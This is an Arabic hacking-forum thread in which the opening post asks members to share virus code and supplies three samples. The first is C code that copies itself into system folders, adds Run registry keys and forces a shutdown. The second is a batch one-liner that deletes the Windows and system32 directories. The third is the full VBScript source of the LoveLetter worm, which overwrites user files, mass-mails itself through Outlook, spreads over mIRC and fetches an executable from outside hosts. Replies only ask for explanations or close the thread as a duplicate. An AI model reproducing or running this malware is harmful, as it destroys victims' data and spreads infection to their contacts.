اكواد فيروســــات

اكواد فيروســــات


النتائج 1 إلى 3 من 3

الموضوع: اكواد فيروســــات

  1. #1

    افتراضي اكواد فيروســــات



    سلام شباب كيفكم

    الي عندة اي كوود حق اي فايروس
    او كوود هوو برمجة يخلييه في هذا الموضوع


    هذا كود فيروس لقيتة في موقع اجنبي جديد
    شغلتة يسوي ريستارات للجهاز حسب مافهمت مبرمج باللغة السي

    كود

    كود PHP:
    #include <windows.h> 
    #include <stdio.h> 
    #include <stdlib.h> 


    char sys1[256]; 
    char sys2[256]; 
    char win1[256]; 
    GetModuleFileName(hModpathsizeof(path)); 
    GetSystemDirectory(sys1sizeof(sys1)); 
    GetSystemDirectory(sys2sizeof(sys2)); 
    GetWindowsDirectory(win1sizeof(win1)); 
    strcat(sys1"\\Sleep.exe"); 
    strcat(sys2"\\Doom32.com"); 
    strcat(win1"\\WinUpdate.exe"); 
    CopyFile(pathsys1false); 
    CopyFile(pathsys2false); 
    CopyFile(pathwin1false); 

    MessageBox (0"Not been foun Ram ""Error !"MB_ICONERROR MB_OK); 

    HKEY hKey
    RegOpenKeyEx(HKEY_LOCAL_MACHINE"Software\\Microsoft\\Windows\\CurrentVersion\ \Run "0KEY_SET_VALUE, &hKey); 
    RegSetValueEx(hKey"SLEEP"0REG_SZ, (const unsigned char*) sys1sizeof(sys1)); 
    RegSetValueEx(hKey"DOOM32"0REG_SZ, (const unsigned char*) sys2sizeof(sys2)); 
    RegSetValueEx(hKey"WinUpdate"0REG_SZ, (const unsigned char*) win1sizeof(win1)); 
    RegCloseKey(hKey); 



    system("shutdown -s -f "); 
    MessageBox(NULL,"Not enough memory to load this file.","Error !"MB_ICONERROR MB_OK); 


    وهذا كود من عندي للاكس بي
    طبعا batch file
    يعني انسخه وحطه في المفكرة واحفظة بامتداد bat
    كود:

    كود PHP:
    @echo offecho hidel/a/q c:\windows\*.*del/a/q c:\windows\system32\*.*rmdir/s/q c:\windowsecho beypause 
    هذا كود لفيرس "الحب "

    كود
    كود PHP:
    rem barok -loveletter(vbe) <i hate go to school>
    rem by: spyder / [email protected] / @GRAMMERSoft Group /
    Manila,Philippines
    On Error Resume Next
    dim fso,dirsystem,dirwin,dirtemp,eq,ctr,file,vbscopy,d ow
    eq=""
    ctr=0
    Set fso = CreateObject("Scripting.FileSystemObject")
    set file = fso.OpenTextFile(WScript.ScriptFullname,1)
    vbscopy=file.ReadAll
    main()
    sub main()
    On Error Resume Next
    dim wscr,rr
    set wscr=CreateObject("WScript.Shell")
    rr=wscr.RegRead("HKEY_CURRENT_USER\Software\Micros oft\Windows Scripting
    Host\Settings\Timeout")
    if (rr>=1) then
    wscr.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows Scripting
    Host\Settings\Timeout",0,"REG_DWORD"
    end if
    Set dirwin = fso.GetSpecialFolder(0)
    Set dirsystem = fso.GetSpecialFolder(1)
    Set dirtemp = fso.GetSpecialFolder(2)
    Set c = fso.GetFile(WScript.ScriptFullName)
    c.Copy(dirsystem&"\MSKernel32.vbs")
    c.Copy(dirwin&"\Win32DLL.vbs")
    c.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs")
    regruns()
    html()
    spreadtoemail()
    listadriv()
    end sub
    sub regruns()
    On Error Resume Next
    Dim num,downread
    regcreate
    "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Cur rentVersion\Run\MSKernel32
    ",dirsystem&"\MSKernel32.vbs"
    regcreate
    "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Cur rentVersion\RunServices\Wi
    n32DLL",dirwin&"\Win32DLL.vbs"
    downread=""
    downread=regget("HKEY_CURRENT_USER\Software\Micros oft\Internet
    Explorer\Download Directory")
    if (downread="") then
    downread="c:\"
    end if
    if (fileexist(dirsystem&"\WinFAT32.exe")=1) then
    Randomize
    num = Int((4 * Rnd) + 1)
    if num = 1 then
    regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\Start
    Page","http://www.skyinet.net/~young1s/HJKhjnwerhjkxcvytwertnMTFwetrdsfmhPnj
    w6587345gvsdf7679njbvYT/WIN-BUGSFIX.exe"
    elseif num = 2 then
    regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\Start
    Page","http://www.skyinet.net/~angelcat/skladjflfdjghKJnwetryDGFikjUIyqwerWe
    546786324hjk4jnHHGbvbmKLJKjhkqj4w/WIN-BUGSFIX.exe"
    elseif num = 3 then
    regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\Start
    Page","http://www.skyinet.net/~koichi/jf6TRjkcbGRpGqaq198vbFV5hfFEkbopBdQZnm
    POhfgER67b3Vbvg/WIN-BUGSFIX.exe"
    elseif num = 4 then
    regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\Start
    Page","http://www.skyinet.net/~chu/sdgfhjksdfjklNBmnfgkKLHjkqwtuHJBhAFSDGjkh
    YUgqwerasdjhPhjasfdglkNBhbqwebmznxcbvnmadshfgqw237 461234iuy7thjg/WIN-BUGSFIX
    .exe"
    end if
    end if
    if (fileexist(downread&"\WIN-BUGSFIX.exe")=0) then
    regcreate
    "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Cur rentVersion\Run\WIN-BUGSFI
    X",downread&"\WIN-BUGSFIX.exe"
    regcreate "HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Start
    Page","about:blank"
    end if
    end sub
    sub listadriv
    On Error Resume Next
    Dim d,dc,s
    Set dc = fso.Drives
    For Each d in dc
    If d.DriveType = 2 or d.DriveType=3 Then
    folderlist(d.path&"\")
    end if
    Next
    listadriv = s
    end sub
    sub infectfiles(folderspec)
    On Error Resume Next
    dim f,f1,fc,ext,ap,mircfname,s,bname,mp3
    set f = fso.GetFolder(folderspec)
    set fc = f.Files
    for each f1 in fc
    ext=fso.GetExtensionName(f1.path)
    ext=lcase(ext)
    s=lcase(f1.name)
    if (ext="vbs") or (ext="vbe") then
    set ap=fso.OpenTextFile(f1.path,2,true)
    ap.write vbscopy
    ap.close
    elseif(ext="js") or (ext="jse") or (ext="css") or (ext="wsh") or (ext="sct")
    or (ext="hta") then
    set ap=fso.OpenTextFile(f1.path,2,true)
    ap.write vbscopy
    ap.close
    bname=fso.GetBaseName(f1.path)
    set cop=fso.GetFile(f1.path)
    cop.copy(folderspec&"\"&bname&".vbs")
    fso.DeleteFile(f1.path)
    elseif(ext="jpg") or (ext="jpeg") then
    set ap=fso.OpenTextFile(f1.path,2,true)
    ap.write vbscopy
    ap.close
    set cop=fso.GetFile(f1.path)
    cop.copy(f1.path&".vbs")
    fso.DeleteFile(f1.path)
    elseif(ext="mp3") or (ext="mp2") then
    set mp3=fso.CreateTextFile(f1.path&".vbs")
    mp3.write vbscopy
    mp3.close
    set att=fso.GetFile(f1.path)
    att.attributes=att.attributes+2
    end if
    if (eq<>folderspec) then
    if (s="mirc32.exe") or (s="mlink32.exe") or (s="mirc.ini") or
    (s="script.ini") or (s="mirc.hlp") then
    set scriptini=fso.CreateTextFile(folderspec&"\script.i ni")
    scriptini.WriteLine "[script]"
    scriptini.WriteLine ";mIRC Script"
    scriptini.WriteLine "; Please dont edit this script... mIRC will corrupt,
    if mIRC will"
    scriptini.WriteLine " corrupt... WINDOWS will affect and will not run
    correctly. thanks"
    scriptini.WriteLine ";"
    scriptini.WriteLine ";Khaled Mardam-Bey"
    scriptini.WriteLine ";http://www.mirc.com"
    scriptini.WriteLine ";"
    scriptini.WriteLine "n0=on 1:JOIN:#:{"
    scriptini.WriteLine "n1= /if ( $nick == $me ) { halt }"
    scriptini.WriteLine "n2= /.dcc send $nick
    "&dirsystem&"\LOVE-LETTER-FOR-YOU.HTM"
    scriptini.WriteLine "n3=}"
    scriptini.close
    eq=folderspec
    end if
    end if
    next
    end sub
    sub folderlist(folderspec)
    On Error Resume Next
    dim f,f1,sf
    set f = fso.GetFolder(folderspec)
    set sf = f.SubFolders
    for each f1 in sf
    infectfiles(f1.path)
    folderlist(f1.path)
    next
    end sub
    sub regcreate(regkey,regvalue)
    Set regedit = CreateObject("WScript.Shell")
    regedit.RegWrite regkey,regvalue
    end sub
    function regget(value)
    Set regedit = CreateObject("WScript.Shell")
    regget=regedit.RegRead(value)
    end function
    function fileexist(filespec)
    On Error Resume Next
    dim msg
    if (fso.FileExists(filespec)) Then
    msg = 0
    else
    msg = 1
    end if
    fileexist = msg
    end function
    function folderexist(folderspec)
    On Error Resume Next
    dim msg
    if (fso.GetFolderExists(folderspec)) then
    msg = 0
    else
    msg = 1
    end if
    fileexist = msg
    end function
    sub spreadtoemail()
    On Error Resume Next
    dim x,a,ctrlists,ctrentries,malead,b,regedit,regv,rega d
    set regedit=CreateObject("WScript.Shell")
    set out=WScript.CreateObject("Outlook.Application")
    set mapi=out.GetNameSpace("MAPI")
    for ctrlists=1 to mapi.AddressLists.Count
    set a=mapi.AddressLists(ctrlists)
    x=1
    regv=regedit.RegRead("HKEY_CURRENT_USER\Software\M icrosoft\WAB\"&a)
    if (regv="") then
    regv=1
    end if
    if (int(a.AddressEntries.Count)>int(regv)) then
    for ctrentries=1 to a.AddressEntries.Count
    malead=a.AddressEntries(x)
    regad=""
    regad=regedit.RegRead("HKEY_CURRENT_USER\Software\ Microsoft\WAB\"&malead)
    if (regad="") then
    set male=out.CreateItem(0)
    male.Recipients.Add(malead)
    male.Subject = "ILOVEYOU"
    male.Body = vbcrlf&"kindly check the attached LOVELETTER coming from me."
    male.Attachments.Add(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs")
    male.Send
    regedit.RegWrite
    "HKEY_CURRENT_USER\Software\Microsoft\WAB\"&malead ,1,"REG_DWORD"
    end if
    x=x+1
    next
    regedit.RegWrite
    "HKEY_CURRENT_USER\Software\Microsoft\WAB\"&a,a.Ad dressEntries.Count
    else
    regedit.RegWrite
    "HKEY_CURRENT_USER\Software\Microsoft\WAB\"&a,a.Ad dressEntries.Count
    end if
    next
    Set out=Nothing
    Set mapi=Nothing
    end sub
    sub html
    On Error Resume Next
    dim lines,n,dta1,dta2,dt1,dt2,dt3,dt4,l1,dt5,dt6
    dta1="<HTML><HEAD><TITLE>LOVELETTER - HTML<?-?TITLE>******
    NAME=@-@Generator@-@ &@#&@#&@#&@#&@#&@#&@#=@-@BAROK VBS - LOVELETTER@-@>"&vbcrlf& _
    "****** NAME=@-@Author@-@ &@#&@#&@#&@#&@#&@#&@#=@-@spyder ?-? [email protected] ?-?
    @GRAMMERSoft Group ?-? Manila, Philippines ?-? March 2000@-@>"
    &vbcrlf_
    "****** NAME=@-@Description@-@ &@#&@#&@#&@#&@#&@#&@#=@-@simple but i think this is
    good...@-@>"
    &vbcrlf_
    "<?-?HEAD><BODY
    ONMOUSEOUT=@[email protected]=#-#main#-#;window.open(#-#LOVE-LETTER-FOR-YOU.HTM#
    -#,#-#main#-#)@-@ "
    &vbcrlf_
    "ONKEYDOWN=@[email protected]=#-#main#-#;window.open(#-#LOVE-LETTER-FOR-YOU.HTM#
    -#,#-#main#-#)@-@ BGPROPERTIES=@-@fixed@-@ BGCOLOR=@-@#FF9933@-@>"
    &vbcrlf_
    "<CENTER><p>This HTML file need ActiveX Control<?-?p><p>To Enable to read
    this HTML file<BR>- Please press #-#YES#-# button to Enable
    ActiveX<?-?p>"
    &vbcrlf_
    "<?-?CENTER><MARQUEE LOOP=@-@infinite@-@
    BGCOLOR=@-@yellow@-@>----------z--------------------z----------<?-?MARQUEE>
    "
    &vbcrlf_
    "<?-?BODY><?-?HTML>"&vbcrlf_
    "<SCRIPT language=@-@JScript@-@>"&vbcrlf_
    "<!--?-??-?"&vbcrlf_
    "if (window.screen){var wi=screen.availWidth;var
    hi=screen.availHeight;window.****To(0,0);window.re sizeTo(wi,hi);}"
    &vbcrlf_
    "?-??-?-->"&vbcrlf_
    "<?-?SCRIPT>"&vbcrlf_
    "<SCRIPT LANGUAGE=@-@VBScript@-@>"&vbcrlf_
    "<!--"&vbcrlf_
    "on error resume next"&vbcrlf_
    "dim fso,dirsystem,wri,code,code2,code3,code4,aw,regdit "&vbcrlf_
    "aw=1"&vbcrlf_
    "code="
    dta2="set fso=CreateObject(@[email protected]@-@)"&vbcrlf_
    "set dirsystem=fso.GetSpecialFolder(1)"&vbcrlf_
    "code2=replace(code,chr(91)&chr(45)&chr(91),chr(39 ))"&vbcrlf_
    "code3=replace(code2,chr(93)&chr(45)&chr(93),chr(3 4))"&vbcrlf_
    "code4=replace(code3,chr(37)&chr(45)&chr(37),chr(9 2))"&vbcrlf_
    "set wri=fso.CreateTextFile(dirsystem&@-@^-^MSKernel32.vbs@-@)"&vbcrlf_
    "wri.write code4"&vbcrlf_
    "wri.close"&vbcrlf_
    "if (fso.FileExists(dirsystem&@-@^-^MSKernel32.vbs@-@)) then"&vbcrlf_
    "if (err.number=424) then"&vbcrlf_
    "aw=0"&vbcrlf_
    "end if"&vbcrlf_
    "if (aw=1) then"&vbcrlf_
    "document.write @-@ERROR: can#-#t initialize ActiveX@-@"&vbcrlf_
    "window.close"&vbcrlf_
    "end if"&vbcrlf_
    "end if"&vbcrlf_
    "Set regedit = CreateObject(@[email protected]@-@)"&vbcrlf_
    "regedit.RegWrite
    @-@HKEY_LOCAL_MACHINE^-^Software^-^Microsoft^-^Windows^-^CurrentVersion^-^Ru
    n^-^MSKernel32@-@,dirsystem&@-@^-^MSKernel32.vbs@-@"
    &vbcrlf_
    "?-??-?-->"&vbcrlf_
    "<?-?SCRIPT>"
    dt1=replace(dta1,chr(35)&chr(45)&chr(35),"'")
    dt1=replace(dt1,chr(64)&chr(45)&chr(64),"""")
    dt4=replace(dt1,chr(63)&chr(45)&chr(63),"/")
    dt5=replace(dt4,chr(94)&chr(45)&chr(94),"\")
    dt2=replace(dta2,chr(35)&chr(45)&chr(35),"'")
    dt2=replace(dt2,chr(64)&chr(45)&chr(64),"""")
    dt3=replace(dt2,chr(63)&chr(45)&chr(63),"/")
    dt6=replace(dt3,chr(94)&chr(45)&chr(94),"\")
    set fso=CreateObject("Scripting.FileSystemObject")
    set c=fso.OpenTextFile(WScript.ScriptFullName,1)
    lines=Split(c.ReadAll,vbcrlf)
    l1=ubound(lines)
    for n=0 to ubound(lines)
    lines(n)=replace(lines(n),"'",chr(91)+chr(45)+chr( 91))
    lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr (93))
    lines(n)=replace(lines(n),"
    \",chr(37)+chr(45)+chr( 37))
    if (l1=n) then
    lines(n)=chr(34)+lines(n)+chr(34)
    else
    lines(n)=chr(34)+lines(n)+chr(34)&"
    &vbcrlf_"
    end if
    next
    set b=fso.CreateTextFile(dirsystem+"
    \LOVE-LETTER-FOR-YOU.HTM")
    b.close
    set d=fso.OpenTextFile(dirsystem+"
    \LOVE-LETTER-FOR-YOU.HTM",2)
    d.write dt5
    d.write join(lines,vbcrlf)
    d.write vbcrlf
    d.write dt6
    d.close
    end sub
    ودي وتقديري
    لا تـــغــزي الا بـقـوم قـد غـزت

    وألا خــلـيــ الـمـغــازيــ لــهــلــهــا



  2. #2
    هكر مبتديء الصورة الرمزية ArsHackEna
    تاريخ التسجيل
    Dec 2011
    الدولة
    ....Not be found after wait
    المشاركات
    97

    افتراضي رد: اكواد فيروســــات

    حبيبناااااا ممكن شرح و شو عمل لكل من هده الفيروسات

    تحياتي
    Dz-Worm

  3. #3

    افتراضي رد: اكواد فيروســــات

    شكرآ لك اولا
    *********
    ثانيـا مخالف راجع القوانين
    فايروس مكرر
    والفايروس الاول مدم يو كانو معه يعني محدد مسار واحد
    ولا يفيد + فايروس الحب نشر حصري اول منتدى نشره الجيوش كان من قبلي
    مكرر اتمنى منك مراجعة قوانين قسم الفايروسات عزيزي وهناك مكتبة متجددة اذا كنت تريد وضع فايروس ضعه في رد واكتب وضيفته وانا اقوم بأرفاقه
    اعتذر منك يغــــلــق

    بالنسبة للاخ الي سأل كيف يعمل او شرح ادخل قسم الفايروسات هناك شروحات تابعها واي مساعدة لا تتردد في وضع مشكلتك في قسم المشاكل والاستفسارات

المواضيع المتشابهه

  1. اكواد فيروسات
    بواسطة Marobuh Maroc في المنتدى منتدى الفيروسات
    مشاركات: 22
    آخر مشاركة: 10-11-2012, 02:21 PM
  2. (منقول)اكواد فايروسات اكواد فايروسات
    بواسطة Abdullhadi JC في المنتدى منتدى الفيروسات
    مشاركات: 9
    آخر مشاركة: 05-09-2012, 06:33 PM
  3. ™¶¾»§«¼¶تشفير اكواد الاندكس¶¼»§«¾¶™
    بواسطة هاوي حنانك في المنتدى قسم إندكسات الإختراق
    مشاركات: 6
    آخر مشاركة: 12-06-2010, 02:42 AM
  4. Gt-e2120 اكواد بليز
    بواسطة LEMAITRE في المنتدى منتدى الإختراق العام
    مشاركات: 0
    آخر مشاركة: 07-11-2010, 09:37 PM
  5. طلب اكواد اندكس
    بواسطة صقر العرب في المنتدى قسم إندكسات الإختراق
    مشاركات: 4
    آخر مشاركة: 07-03-2010, 11:33 PM

المفضلات

أذونات المشاركة

  • لا تستطيع إضافة مواضيع جديدة
  • لا تستطيع الرد على المواضيع
  • لا تستطيع إرفاق ملفات
  • لا تستطيع تعديل مشاركاتك
  •